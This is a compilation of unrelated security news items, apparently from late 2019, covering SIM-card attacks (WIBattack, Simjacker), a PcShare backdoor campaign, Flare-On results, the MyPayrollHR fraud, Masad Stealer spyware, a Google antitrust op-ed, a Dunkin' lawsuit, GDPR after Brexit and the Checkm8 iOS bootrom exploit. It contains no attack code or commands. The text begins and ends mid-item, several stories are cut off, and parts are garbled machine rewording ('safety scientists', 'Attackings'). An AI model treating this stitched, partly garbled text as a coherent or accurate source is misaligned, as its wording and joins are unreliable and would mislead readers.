Summarizing, at least two hacking techniques leverage vulnerabilities in one of the components of most of the mobile SIM cards of the market potentially exposing billions of mobile users at attacks.

The researcher announced that is working on a mobile phone app that would allow users to scan their SIM cards to determine if they are vulnerable to the Simjacker attack.

The researchers at SRLabs also developed an Android app, named SnoopSnitch, that can detect Simjacker-like attacks. The SnoopSnitch app only runs on rooted Android mobile phones with a Qualcomm chipset.

“The SnoopSnitch Android app warns users about binary SMS attacks including Simjacker since 2014. (Attack alerting requires a rooted Android phone with Qualcomm chipset.)” reported SRLLabs.

Pierluigi Paganini

(SecurityAffairs – WIBattack, hacking)

The post After SIMJacker, WIBattack hacking technique disclosed. Billions of users at risk appeared first on Security Affairs.

Cylance Security Researchers Warn Technology Firms in Southeast Asia for Chinese Open –Source Backdoor

Attackings of technology businesses in Southeast Asia by a suspected Chinese threat actor employ a version of the open-source PcShare backdoor, safety scientists in BlackBerry Cylance warn.

The attackers also used a Trojan-made screen reader application, which replaces the built-in Windows “Easy Access” narrator function, mainly gaining distant control over the infected systems without the victim being required to steal credentials.

The Chinese open-source backdoor, PcShare, has been altered specifically for this campaign with extra C&C encryption and proxy bypass. In addition, the operators have removed from the code any unused features.

The malware is performed by DLL side-loading on the victim’s machine. Specifically, the backdoor is laid out by the lawful NVIDIA Smart Maximize Helper Host implementation, which safety scientists found to be a component of the NVIDIA GPU graphics systems.

After the original compromise, a number of instruments are used, many of which are based on software accessible to the general public on Chinese programming portals. One of these is a Trojan who uses Microsoft accessibility features to obtain SYSTEM access by trojanizing the executable Narrator.

The hackers used memory injection so the primary backdoor binary does not touch the disk and encoded payload based on the runway to prevent detection. The loader is configured in plain text, but the URL provided is not the true C&C address. It instead links to a remote file with C&C communication information.

While threat actors have used the same PcShare payload over multiple attacks, they often have modified the side-loaded DLL for each target, including the C&C IP addresses and victims identifiers, to update the configuration details.

The malware determines persistence by adding a record entry and generates mutexes so that only one example of the payload injection routine is running.

Backdoor features include distinct operating modes (such as SSH & Telnet, the automatic upgrade, upload and download mode), traffic compression using a personalized LZW algorithm, encrypted C&C communication using the PolarSSL library, and proxy authentication via local user credentials.

Malware remote management capacities include listing, creating, renaming and deleting files and directories; listing and killing procedures; editing registry keys and values; listing and manipulating service; enumeration and controlling windows; running binaries; uploading extra files to C&C or URL; uploading files to the C&C; spawning command-line shell; navigating to the message boxes; viewing URLs;

The fake narrator app used by the threat actor is not trying to substitute the lawful app, but instead creates a copy to copy the user interface of the narrator. The trojanized application is supplied after attackers obtain administrative rights on the scheme and provide the computer with SYSTEM-level access.

First launched four years ago, the fake narrator app, but a threat actor continues to alter it to guarantee it suits the environment of victims, tell the scientists. It seems that the instrument was only used in a very small amount of assaults.

BlackBerry Cylance thinks that the actor has Chinese origin based on the use of Chinese open source initiatives and the geographical place of the victims.

“As of today, precise attribution of these attacks has proven elusive. The use of PcShare backdoor, as well as the geographical location of the victims, bear similarities to a known threat actor called Tropic Trooper, which is actively targeting government institutions and heavy industry companies in Taiwan and Philippines,” BlackBerry Cylance says.

The post Cylance Security Researchers Warn Technology Firms in Southeast Asia for Chinese Open –Source Backdoor appeared first on .

2019 Flare-On Challenge Solutions

We are pleased to announce the conclusion of the sixth annual Flare-On Challenge. The popularity of this event continues to grow and this year we saw a record number of players as well as finishers. We will break down the numbers later in the post, but right now let’s look at the fun stuff: the prize! Each of the 308 dedicated and amazing players that finished our marathon of reverse engineering this year will receive a medal. These hard-earned awards will be shipping soon. Incidentally, the number of finishers smashed our estimates, so we have had to order more prizes.

We would like to thank the challenge authors individually for their great puzzles and solutions.

  1. Memecat Battlestation: Nick Harbour (@nickaharbour)
  2. Overlong: Eamon Walsh
  3. FlareBear: Mortiz Raabe (@m_r_tz)
  4. DnsChess: Eamon Walsh
  5. 4k demo: Christopher Gardner (@t00manybananas)
  6. Bmphide: Tyler Dean (@spresec)
  7. Wopr: Sandor Nemes (@sandornemes)
  8. Snake: Alex Rich (@AlexRRich)
  9. Reloaderd: Sebastian Vogl
  10. MugatuWare: Blaine Stancill (@MalwareMechanic)
  11. vv_max: Dhanesh Kizhakkinan (@dhanesh_k)
  12. help: Ryan Warns (@NOPAndRoll)

And now for the stats. As of 10:00am ET, participation was at an all-time high, with 5,790 players registered and 3,228 finishing at least one challenge. This year had the most finishers ever with 308 players completing all twelve challenges.

The U.S. reclaimed the top spot of total finishers with 29. Singapore strengthened its already unbelievable position of per-capita top Flare-On finishing country with one Flare-On finisher per every 224,000 persons living in Singapore. Rounding out the top five are the consistent high-finishing countries of Vietnam, Russia, and China.

 

All the binaries from this year’s challenge are now posted on the Flare-On website. Here are the solutions written by each challenge author:

  1. SOLUTION #1
  2. SOLUTION #2
  3. SOLUTION #3
  4. SOLUTION #4
  5. SOLUTION #5
  6. SOLUTION #6
  7. SOLUTION #7
  8. SOLUTION #8
  9. SOLUTION #9
  10. SOLUTION #10
  11. SOLUTION #11
  12. SOLUTION #12

More SIM Cards Vulnerable to Simjacker Attack Than Previously Disclosed

Remember the Simjacker vulnerability? Earlier this month, we reported about a critical unpatched weakness in a wide range of SIM cards, which an unnamed surveillance company has actively been exploiting in the wild to remotely compromise targeted mobile phones just by sending a specially crafted SMS to their phone numbers. If you can recall, the Simjacker vulnerability resides in a dynamic

Superhero Movies and Security Lessons

A paper I co-wrote was just published in Security Journal: "Superheroes on screen: real life lessons for security debates":

Abstract: Superhero films and episodic shows have existed since the early days of those media, but since 9/11, they have become one of the most popular and most lucrative forms of popular culture. These fantastic tales are not simple amusements but nuanced explorations of fundamental security questions. Their treatment of social issues of power, security and control are here interrogated using the Film Studies approach of close reading to showcase this relevance to the real-life considerations of the legitimacy of security approaches. By scrutinizing three specific pieces -- Daredevil Season 2, Captain America: Civil War, and Batman v Superman: Dawn of Justice -- superhero tales are framed (by the authors) as narratives which significantly influence the general public's understanding of security, often encouraging them to view expansive power critically­to luxuriate within omnipotence while also recognizing the possibility as well as the need for limits, be they ethical or legal.

This was my first collaboration with Fareed Ben-Youssef, a film studies scholar. (And with Andrew Adams and Kiyoshi Murata.) It was fun to think about and write.

Cyber-Harassment Expert Wins MacArthur Genius Grant

Cyber-Harassment Expert Wins MacArthur Genius Grant

Lawyer, law professor, and civil rights advocate Danielle Keats Citron has been awarded a MacArthur grant for her efforts to address the scourge of cyber-harassment. 

Citron, a professor at Boston University Law School, is one of 26 individuals this year to receive a so-called genius grant from the John D. and Catherine T. MacArthur Foundation. Citron was awarded $625,000 to support her ongoing mission to study and write about online abuse and invasions of sexual privacy, the harm that they inflict, and how law and society should respond to them.

Through her work, Citron has found that cyber-harassment can have a devastating and long-lasting effect on victims, making it difficult for them to go about their daily lives. 

"Cyber-harassment is the targeting of specific individuals with a course of conduct that causes severe emotional distress and often the fear of physical harm, and it impacts them in a way that takes away what we consider crucial ability to make the most out of their lives in the 21st century; to get employment, keep a job, engage with other people, and go to school free from the fear of online abuse," said Citron.

She continued: "We wouldn’t accept people walking down the street and being screeched at and threatened and humiliated and hurt, and we shouldn’t find it an acceptable part of online life."

Citron has been studying and writing about online abuse for 15 years. During that period, she has worked with tech companies to update safety and privacy policies. She has also advised US legislators and state attorneys general on how to combat the most extreme forms of cyber-abuse, including cyber-stalking and revenge porn—the posting of intimate photos or videos without consent. 

The situation is improving, with the number of states to pass cyber-stalking laws rising from 4 in 2009 to 46 today.

Currently, Citron is focused on studying and writing about deep fake technology, which is machine learning technology that lets you manipulate or fabricate audio and video to show people doing and saying things that they’ve never done or said. 

She said: "The technology is advancing so rapidly that soon—within months—technologists expect that the state of the art will become so sophisticated that it will become impossible to distinguish fakery from what’s real. The impact that it has is not just on individuals; it has an impact on the truth and more broadly on our trust in democratic institutions."

MyPayrollHR CEO Arrested, Admits to $70M Fraud

Earlier this month, employees at more than 1,000 companies saw one or two paycheck’s worth of funds deducted from their bank accounts after the CEO of their cloud payroll provider absconded with $35 million in payroll and tax deposits from customers. On Monday, the CEO was arrested and allegedly confessed that the diversion was the last desperate gasp of a financial shell game that earned him $70 million over several years.

Michael T. Mann, the 49-year-old CEO of Clifton Park, NY-based MyPayrollHR, was arrested this week and charged with bank fraud. In court filings, FBI investigators said Mann admitted under questioning that in early September — on the eve of a big payroll day — he diverted to his own bank account some $35 million in funds sent by his clients to cover their employee payroll deposits and tax withholdings.

After that stunt, two different banks that work with Mann’s various companies froze those corporate accounts to keep the funds from being moved or withdrawn. That action set off a chain of events that led another financial institution that helps MyPayrollHR process payments to briefly pull almost $26 million out of checking accounts belonging to employees at more than 1,000 companies that use MyPayrollHR.

At the same time, MyPayrollHR sent a message (see screenshot above) to clients saying it was shutting down and that customers should find alternative methods for paying employees and for processing payroll going forward.

In the criminal complaint against Mann (PDF), a New York FBI agent said the CEO admitted that starting in 2010 or 2011 he began borrowing large sums of money from banks and financing companies under false pretenses.

“While stating that MyPayroll was legitimate, he admitted to creating other companies that had no purpose other than to be used in the fraud; fraudulently representing to banks and financing companies that his fake businesses had certain receivables that they did not have; and obtaining loans and lines of credit by borrowing against these non-existent receivables.”

“Mann estimated that he fraudulently obtained about $70 million that he has not paid back. He claimed that he committed the fraud in response to business and financial pressures, and that he used almost all of the fraudulently obtained funds to sustain certain businesses, and purchase and start new ones. He also admitted to kiting checks between Bank of America and Pioneer [Savings Bank], as part of the fraudulent scheme.”

Check-kiting is the illegal act of writing a check from a bank account without sufficient funds and depositing it into another bank account, explains MagnifyMoney.com. “Then, you withdraw the money from that second account before the original check has been cleared.”

Kiting also is known as taking advantage of the “float,” which is the amount of time between when an individual submits a check as payment and when the individual’s bank is instructed to move the funds from the account.

Magnify Money explains more:

“Say, for example, that you write yourself a check for $500 from checking account A, and deposit that check into checking account B — but the balance in checking account A is only $75. Then, you promptly withdraw the $500 from checking account B. This is check-kiting, a form of check fraud that uses non-existent funds in a checking account or other type of bank account. Some check-kiting schemes use multiple accounts at a single bank, and more complicated schemes involve multiple financial institutions.”

“In a more complex scenario, a person could open checking accounts at bank A and bank B, at first depositing $500 into bank A and nothing in bank B. Then, they could write a check for $10,000 with account A and deposit it into account B. Bank B immediately credits the account, and in the time it might take for bank B to clear the check (generally about three business days), the scammer writes a $10,000 check with bank B, which gets deposited into bank A to cover the first check. This could keep going, with someone writing checks between banks where there’s no actual funds, yet the bank believes the money is real and continues to credit the accounts.”

The government alleges Mann was kiting millions of dollars in checks between his accounts at Bank of American and Pioneer from Aug. 1, 2019 to Aug. 30, 2019.

For more than a decade, MyPayrollHR worked with California-based Cachet Financial Services to process payroll deposits for MyPayrollHR client employees. Every other week, MyPayrollHR’s customers would deposit their payroll funds into a holding account run by Cachet, which would then disburse the payments into MyPayrollHR client employee bank accounts.

But when Mann diverted $26 million in client payroll deposits from Cachet to his account at Pioneer Bank, Cachet’s emptied holding account was debited for the payroll payments. Cachet quickly reversed those deposits, causing one or two pay periods worth of salary to be deducted from bank accounts for employees of companies that used MyPayrollHR.

That action caused so much uproar from affected companies and their employees that Cachet ultimately decided to cancel all of those reversals and absorb that $26 million hit, which it is now trying to recover through the courts.

According to prosecutors in New York, Pioneer was Mann’s largest creditor.

“Mann stated that the payroll issue was precipitated by his decision to route MyPayroll’s clients’ payroll payments to an account at Pioneer instead of directly to Cachet,” wrote FBI Special Agent Matthew J. Wabby. “He did this in order to temporarily reduce the amount of money he owed to Pioneer. When Pioneer froze Mann’s accounts, it’s also (inadvertently) stopped movement of MyPayroll’s clients’ payroll payments to Cachet.”

Approximately $9 million of the $35 million diverted by Mann was supposed to go to accounts at the National Payment Corporation (NatPay) — the Florida-based firm which handles tax withholdings for MyPayrollHR clients. NatPay said its insurance should help cover the losses it incurred when MyPayrollHR’s banks froze the company’s accounts.

Court records indicate Mann hasn’t yet entered a plea, but that he was ordered to be released today under a $200,000 bond secured by a family home and two vehicles. His passport also was seized.

New Spyware Threatens Telegram’s 200 Million Users

New Spyware Threatens Telegram's 200 Million Users

A new piece of spyware, designed to steal sensitive information from users of the messaging app Telegram, is for sale on the black market.  

Trojan-delivered Masad Stealer and Clipper was clocked by researchers at Juniper Threat Labs. The spyware uses Telegram as a command and control (CnC) channel to cloak itself in a veil of anonymity. 

After installing itself on the computer of a Telegram user, Masad Stealer busies itself collecting information stored on the system, such as browser passwords, autofill browser field data, and desktop files. The spyware also automatically replaces cryptocurrency wallets from the clipboard with its own.

Other information vulnerable to an attack perpetrated through Masad Stealer includes credit card browser data, FileZilla files, steam files, browser cookies, PC and system information, and installed software and processes. 

Masad Stealer is being advertised for sale in several hack forums, making it an active and ongoing threat. Buyers can pick up a variety of versions, ranging from a free one to a premium package costing $85, with each tier of the malware offering different features.

Researchers at Juniper said: "Masad Stealer sends all of the information it collects—and receives commands from—a Telegram bot controlled by the threat actor deploying that instance of Masad. Because Masad is being sold as off-the-shelf malware, it will be deployed by multiple threat actors who may or may not be the original malware writers."

Masad Stealer is written using Autoit scripts and then compiled into an executable Windows file. Most of the samples discovered by Juniper were 1.5 MiB in size; however, the spyware has also been strutting around in larger executables and has been spotted bundled into other software.

Telegram, which celebrated its sixth birthday in August, has over 200 million monthly active users. While its platform may have been breached, the app is fully confident in its ability to protect the privacy of messages sent by its users. 

The app claims on its website to be "more secure than mass market messengers like WhatsApp and Line" and offers anyone who can decipher a Telegram message up to $300,000 in prize money. 

It’s Google’s World. Your Business Is Just Living in It

Fifty attorneys general announced earlier this month that Google is the target of an antitrust probe. Any business owner who has happened to find themselves stuck in the company’s orbit–that would be any company with a digital presence–won’t hesitate to tell you such a move is long overdue.

Case in point: I just did a Google search for Basecamp, an online project management tool. The first two hits were for different companies–Smartsheet and Monday.com. Not too long ago, the same search resulted in a first hit featuring Basecamp, but it was an ad. The copy: “We don’t want to run this ad.”

“We’re the #1 result,” Basecamp’s ad copy continued, “but this site lets companies advertise against us using our brand. So here we are. A small, independent co. forced to pay ransom to a giant tech company.”

Basecamp founder and CEO Jason Fried doubled down on this sentiment on his Twitter feed, stating “[Y]ou’re forced to pay up if you want to be found. It’s a shakedown. It’s ransom.”

An Offer Businesses Can’t Refuse

Fried is by no means alone. Any business with an online presence has at one time or another played by Google’s rules to stay competitive. For most, it’s a daily reality. The reason is simple. Most businesses need websites, and websites need to follow Google’s best practices to be found in online searches, terms Google can force because it currently has 92 percent worldwide market share on search.

Google can make drastic changes to these best practices that have effectively buried companies overnight. A business that finds itself out of Google’s good graces, or in the case of Basecamp, finds itself nestled one or two slots beneath competitor ads in search results, would need to create a paid campaign via Google Ads (38.2 percent of the online advertising market) and pay to show up in search results.

A business with a physical location that wants to show up in local search results needs to create an account for Google My Business, so it can show up in Google Maps (which accounts for 67 percent of navigation app usage), but also needs to keep an eye on Google Reviews left on its business listing. The performance of ads, search traffic, and app usage can all be tracked via Google Analytics (over 70 percent of the analytics market), which provides business owners (and Google, of course) detailed information about who’s visiting their websites or using their apps. Most of these users will be using Google’s Chrome web browser (64 percent of users worldwide), on a device running Android (76 percent of mobile users worldwide), which was, of course, developed by Google.

Per Bob Dylan, “It doesn’t take a weatherman to tell which way the wind blows.” It would seem that Google has a monopoly, but that’s for the court to decide. On the face of it, it’s not necessarily bad news; anyone who remembers the days of phone books, mail order catalogs, and paper maps is most likely glad for the convenience of the services Google provides–businesses and consumers alike.

What’s problematic is the necessity of it all. It’s all but impossible for a business to opt out of Google’s services. Even taco trucks have websites. It’s equally difficult for us as consumers to opt out entirely, although alternatives (e.g., iOS, Apple Maps, and Bing) do exist. The fact is that businesses and industries that don’t in some way rely on at least one of Google’s services to be discovered are few and far between.

Our Data Is Valuable

However much value our data has, the fact remains that Google charges us to share it with Google. Nice work if you can get it, right?

When companies use Google’s services to make themselves known to the world, they have to share data on themselves, and also on their customers and clients. Every search query leading to a site, every ad click, every map search, and every visit tracked by analytics is actively helping Google build its library of information on as many people as possible–even people who have never actually used the internet.

As Google continues to expand its services, its ecosystem is oozing into businesses that have no choice but to pony up and participate or be lost in cyberspace. The evolution thus far points to the possibility of increasingly Orwellian methods in the realm of advertising and data collection.

What do I mean by Orwellian? Google Home and Nest products are aggressively moving into the field of facial recognition, and, of course, the company is thus far characteristically coy about the intended uses for the data thus collected.

“We can never say never,” said Google’s general manager of Home and Nest products when asked if data from face scanning would be used to target consumers for advertising. He added that it is not being used for that purpose now.

It’s far too soon to tell how the antitrust probe of Google will turn out, and it’s guaranteed to take a long time to play out. One thing is certain: The stakes are just as high, if not higher, for businesses as they are for consumers, and we all would be better served were we not being served by Google’s tentacular array of services.

The post It’s Google’s World. Your Business Is Just Living in It appeared first on Adam Levin.

Dunkin’ Sued for Keeping Data Breach Secret

Dunkin' Sued for Keeping Data Breach Secret

New York is suing Dunkin' for allegedly failing to inform its customers of multiple cyber-attacks that compromised customer accounts.

According to the lawsuit, filed in state Supreme Court in Manhattan, money was stolen by cyber-criminals, who hacked into the online accounts of 20,000 Dunkin' customers in 2015. New York further alleges that Dunkin' didn't disclose to its customers full details of a cyber-attack that affected 300,000 customer accounts in 2018.

The lawsuit states: "In 2015, Dunkin’s customer accounts were targeted in a series of online attacks. During this period, attackers made millions of automated attempts to access customer accounts. Tens of thousands of customer accounts were compromised. Tens of thousands of dollars on customers’ stored value cards were stolen."

During the summer of 2015, Dunkin's app developer repeatedly alerted Dunkin' to ongoing attempts by hackers to log in to customer accounts and provided the company with a list of 19,715 accounts that had been compromised over just a sample five-day period, but the donut-seller failed to tell customers, according to the lawsuit.   

Dunkin’ chief communications officer Karen Raskopf told Infosecurity Magazine that there was no credence to the claims being made in the lawsuit.

In an emailed statement to Infosecurity Magazine, Raskopf said: "There is absolutely no basis for these claims by the New York Attorney General’s Office. For more than two years, we have fully cooperated with the AG’s investigation into this matter, and we are shocked and disappointed that they chose to move ahead with this lawsuit given the lack of merit to their case. 

"The investigation centered on a credential stuffing incident that occurred in 2015, in which third parties unsuccessfully tried to access approximately 20,000 Dunkin’ app accounts. The database in question did not contain any customer payment card information. 

"The incident was brought to our attention by our then-firewall vendor, and we immediately conducted a thorough investigation. This investigation showed that no customer’s account was wrongfully accessed, and, therefore, there was no reason to notify our customers."  

Dunkin' Brands, Inc. has 8,000 Dunkin' restaurants across America, a thousand of which are in New York.  

"We take the security of our customers’ data seriously and have robust data protection safeguards in place. We look forward to proving our case in court," said Raskopf.

GDPR after Brexit: No Deal and All Other Exit Scenarios Explained

As the British MPs and the EU representatives continue to discuss the specifics of the upcoming Brexit, nothing is yet settled. In this murky context, companies in the UK and companies working with companies in UK are rightly confused.

What about GDPR, the transnational European data protection regulation to which we were just beginning to adjust?

Will there still be a GDPR after Brexit, for the UK space?

If it will change, how so?

Should a new kind of data protection compliance regulation be created for the UK instead of GDPR?

All these topics are intensely debated right now across all business mediums. Unfortunately, there’s a lot of uncertainty and a lot of Brexit and GDPR myths as well.

Let’s walk through everything together and see what will really happen with GDPR after Brexit on all possible scenarios.

Possible Brexit Scenarios

For now, British politicians are still stuck on debating whether they want to comply to the new law against a no deal situation.

There are several possible outcomes, depending on what will be decided on these counts:

  • If they choose to comply with the new law (accept the deal) or not;
  • If they ask for a delay in deciding (Brexit and the deal-or-no-deal debate simply get postponed);
  • If they try to negotiate a new deal;

Regardless of what happens next, the UK and companies connected to this space will still need to deal with GDPR. The GDPR after Brexit issue is not going anywhere.

Even in the most extreme outcomes, data compliance will still be on the agenda. Let’s take a few examples.

A. GDPR after Brexit with a deal

Within the deal currently on the table, GDPR is also stipulated as a must. If the British MPs somehow agree on the deal before the 31st of October deadline, then Brexit goes through as planned. GDPR would be part of the deal with the EU, so the current data compliance regulations stay in place.

In this case, you have nothing to change: GDPR rules stay in place as they are.

B. GDPR if Brexit is delayed and renegotiated

If the British MPs ask for a deadline extension to be able to hopefully gain consensus until then, GDPR essentially remains in place. Until the new deal is discussed and agreed upon, the UK does not technically leave the EU.

That means all European laws and UK-EU agreements stay the same as they were, including the GDPR, at least for the deadline extension.

The political party who initiated Brexit and continues to support it hard says delaying is not an option. But considering that the Parliament can’t seem to reach a consensus on how and when to exit the EU, or even on the idea of exiting at all, a delay is very possible.

C. GDPR after Brexit with no deal (Hard Brexit)

If, let’s say, the UK representatives refuse to comply and accept the deal, this will probably open up a whole can of worms of legal contention.

Until the issues are hashed and rehashed through courts, GDPR will become a big question mark.

One way or another, as the British minister in charge of data protection, Baroness Neville-Rolfe, has recently said, even if GDPR will no longer apply in the UK, some very similar legislation will need to be instated.

“One thing we can say with reasonable confidence is that if any country wishes to share data with EU member states, or for it to handle EU citizens’ data, they will need to be assessed as providing an adequate level of data protection,” Neville-Rolfe said. “This will be a major consideration in the UK’s negotiations going forward.”

While it’s not clear if the UK will still adhere to GDPR after Brexit, or adhere to a similar framework (such as the Privacy Shield, see below), or submit to being independently evaluated,

Useful Info for a GDPR after a No-Deal Brexit:

  • The documents and criteria for the EU’s adequacy decisions (how they decide a country provides adequate data protection and is therefore trustworthy);
  • The Privacy Shield Framework: a framework which allows people to transfer their personal data from the EU to the US while maintaining GDPR standards. There is the possibility for the UK to adhere to it or create a similar framework;
  • The Official GDPR FAQs – on the main GDPR portal.

There are 5 possible scenarios for a GDPR after Brexit with no deal, depending on your role in the data ecosystem.

We’ll tackle each one, but rest assured that the matter of data protection will not return to its pre-GDPR state. Once the world started taking data protection and privacy concerns seriously (and rightly so), there’s no turning back.

Here are the 5 possible scenarios for GDPR after Brexit with no deal:

In all data exchanges, we can speak of data controllers and data processors.

Data controllers are the business entities which collect the data of their clients and contacts (often in order to provide them with services) AND decide the purposes for which that data will be processed.

Data processors are the business entities which process the data on behalf of a data controller (besides any employees of the controller).

Data subjects are the people whose personal data is being processed.

We’ve drawn the 5 possible scenarios for a GDPR after Brexit, depending on the role of the business in the data flow.

  • Scenario 1: Controllers in the UK, providing services for UK people and entities and sharing no personal data with organizations outside the UK;
  • Scenario 2: Controllers in the UK, providing services for the UK but involved with processors in the EU (or anywhere else outside the UK);
  • Scenario 3: Controllers in the UK, providing services for people and business entities in the EU;
  • Scenario 4: Processors in the UK, acting on behalf of controllers or processors in the EU (or UK and EU);
  • Scenario 5: Processors in the UK, acting on behalf of controllers or processors in the UK.

#1. Scenario 1

This scenario is rather simple. Even though there are not a lot of cases like this in real life, since data circulation is never as tightly sealed as this, it has to be covered by any guide.

If you’re among the rare few UK controllers who only provide services to the UK and has no exchanges with non-UK processors, you’re lucky. You don’t really need to concern yourself with GDPR after Brexit.

The data protection laws you will need to abide by after Brexit are going to be more or less the same as the ones you are used to and will be communicated by UK authorities in due time.

It’s highly possible that after the UK leaves EU with no deal, the controllers doing business solely in the UK will need to comply with the Data Protection Act 2018 (DPA2018) instead of the GDPR. Or, another likely possibility is that GDPR will be absorbed into UK’s own laws upon Brexit (even with no deal).

In any case, the controllers defined by scenario 1 are the least affected by the GDPR after Brexit issue, because nothing will actually change for them.

#2. Scenario 2

Most small UK businesses fall into this category, of controllers in the UK who are involved with processors outside EU. Basically, anyone who uses international software like Microsoft, Facebook, Dropbox, and so on, can be fitted into this second scenario.

Legally, nothing really changes in this case either, because GDPR after Brexit will mean adopting the UK data protection law, DPA2018 (linked above). Since the processors outside the UK will still be compliant with GDPR, there is nothing that hinders these UK controllers from continuing to use their services.

#3. Scenario 3

In scenario 3, the UK controllers are not just working with non-UK processors but they are even serving EU-based clients or having EU offices and so on. In this case, the situation is a bit murkier.

The problem is that communicating between various branches and entities involved in the business process might be stalled by GDPR after Brexit.

To be proactive about it, you can designate a DPO (Data Protection Officer) in each country you have offices in, and that should cover the conditions imposed by the EU on third countries (which the UK will effectively become).

This will solve compliance issues, but be warned that handling GDPR after Brexit in paperwork terms might not be the worst of it. Because of the extra hassle involved, it’s very likely that obtaining more clients in the EU market will be difficult. It will be harder to compete with EU controllers who don’t have post-Brexit ambiguity to sort through.

#4. Scenario 4

After May 2018, all processors in the UK who were working with EU organizations were required to have them sign contracts which stipulated how their data would be handled. The issue here is that those contracts and agreements mentioned the UK as an EU country, which will no longer be true.

This means that all this paperwork will need to be redone. It’s best if you are proactive and start sending out the revised forms as soon as the Brexit decision is concluded one way or another.

There is the risk that some of your business partners will decline to resign, but you do the best with what you have and move on. Continuing to do business with them in the absence of flawless paperwork is too great of a risk to take.

#5. Scenario 5

For processors in the UK working only with data of people within the UK (and for controllers in the UK), the same applies as in Scenario 1. In other words, nothing changes, there is no extra concern to be had.

Cybersecurity Risks of GDPR after Brexit: A Few Words of Caution

As you can see by now, GDPR after Brexit will bring a lot of paperwork in many cases. Not just paperwork, but also a lot of communications going on with partners across national frontiers.

Since these communications will not be your standard run-of-the-mill, since the Brexit situation is new to everyone, this can be a huge opportunity for cybercriminals.

Be wary of any email you receive about Brexit and GDPR matters, especially if the sender is prompting you to do something involving vulnerable data. Don’t enter your login details on any page (could be a phishing attempt), don’t engage in conversations with people you don’t really know from before, etc.

Business Email Compromise (BEC) is a growing and costly threat. The little chaos which will likely flood everyone’s emails concerning GDPR after Brexit is the perfect opportunity for BEC attacks.

Spam filters are not enough to tackle it – you need to do some thorough background checks with every email and to also have an email security solution specially designed to counter BEC attacks.

Wrapping it up

I hope this guide helped clear the confusion surrounding GDPR after Brexit. In any case and however convoluted the Brexit process will continue to be, you should take some steps to prepare for the future.

Just look up your own business situation in the scenarios above and find out what can you expect even if we’ll have a no-deal Brexit. Good luck and drop us a line with any concern you might have.

The post GDPR after Brexit: No Deal and All Other Exit Scenarios Explained appeared first on Heimdal Security Blog.

Checkm8: unpatchable iOS exploit could lead to permanent jailbreak for iOS devices running A5 to A11 chips

A security expert has released a new jailbreak, dubbed Checkm8, that impacts all iOS devices running on A5 to A11 chipsets, it works on iPhone models from 4S to 8 and X.

The security expert Axi0mX has released a new jailbreak, dubbed Checkm8, that works on all iOS devices running on A5 to A11 chipsets. The jailbreak works with all Apple products released between 2011 and 2017, including iPhone models from 4S to 8 and X.

Checkm8 leverages vulnerabilities in the Apple Bootrom (secure boot ROM) to achieve full control over their device.

“The bootrom (called “SecureROM” by Apple) is the first significant code that runs on an iDevice. The bootrom is read-only. Finding exploits in the bootrom level is a big achievement since Apple won’t be able to fix it without a hardware revision.” reads a description for the BootRom.

The expert who devised the Checkm8 jailbreak described it as “a permanent unpatchable bootrom exploit,” anyway it is essential to highlight that the exploit could lead to a jailbreak by chaining it with other flaws.

Bootrom jailbreaks are very dangerous because they are permanent and can’t be addressed via software, in order to patch a Bootrom flaw it is necessary to physical modify the chipsets.

Axi0mX’s jailbreak code is marked as a “beta” release, but there is the concrete possibility that experts coders or intelligence agencies will integrate it in hacking tools and malware.

“What I am releasing today is not a full jailbreak with Cydia, just an exploit. Researchers and developers can use it to dump SecureROM, decrypt keybags with AES engine, and demote the device to enable JTAG. You still need additional hardware and software to use JTAG.” wrote the expert.

“Features the exploit allow include:

  • Jailbreak and downgrade iPhone 3GS (new bootrom) with alloc8 untethered bootrom exploit. 🙂
  • Pwned DFU Mode with steaks4uce exploit for S5L8720 devices.
  • Pwned DFU Mode with limera1n exploit for S5L8920/S5L8922 devices.
  • Pwned DFU Mode with SHAtter exploit for S5L8930 devices.
  • Dump SecureROM on S5L8920/S5L8922/S5L8930 devices.
  • Dump NOR on S5L8920 devices.
  • Flash NOR on S5L8920 devices.
  • Encrypt or decrypt hex data on a connected device in pwned DFU Mode using its GID or UID key.

Currently, the jailbreak does not work on Apple’s latest two A12 and A13 chipsets.

Experts pointed out that the jailbreak needs physical access to the device, so and could not be used remotely.

“During iOS 12 betas in summer 2018, Apple patched a critical use-after-free vulnerability in iBoot USB code. This vulnerability can only be triggered over USB and requires physical access. It cannot be exploited remotely. I am sure many researchers have seen that patch.” concludes the expert.

“That’s how I discovered it. It is likely at least a couple other researchers were able to exploit this vulnerability after discovering the patch. The patch is easy to find, but the vulnerability is not trivial to exploit on most devices.”

Pierluigi Paganini

(SecurityAffairs – Checkm8, hacking)

The post Checkm8: unpatchable iOS exploit could lead to permanent jailbreak for iOS devices running A5 to A11 chips appeared first on Security Affairs.

Threat Roundup for September 20 to September 27

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between Sep. 20 to Sep 27. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More

Reference:

TRU272019 – This is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

Divergent Malware Using NodeJS, WinDivert in Fileless Attacks

Samples of a new malware family called “Divergent” are using both NodeJS and WinDivert in a series of fileless attack campaigns. Cisco Talos didn’t identify the exact delivery method for Divergent. Even so, its researchers observed that the samples they analyzed staged and stored configuration date on the registry like other fileless malware. They also […]… Read More

The post Divergent Malware Using NodeJS, WinDivert in Fileless Attacks appeared first on The State of Security.

Hacker Releases ‘Unpatchable’ Jailbreak For All iOS Devices, iPhone 4s to iPhone X

An iOS hacker and cybersecurity researcher today publicly released what he claimed to be a "permanent unpatchable bootrom exploit," in other words, an epic jailbreak that works on all iOS devices ranging from iPhone 4s (A5 chip) to iPhone 8 and iPhone X (A11 chip). Dubbed Checkm8, the exploit leverages unpatchable security weaknesses in Apple's Bootrom (SecureROM), the first significant code

This Week in Security News: Fake Apps on iOS and Google Play and Social Media Security Issues

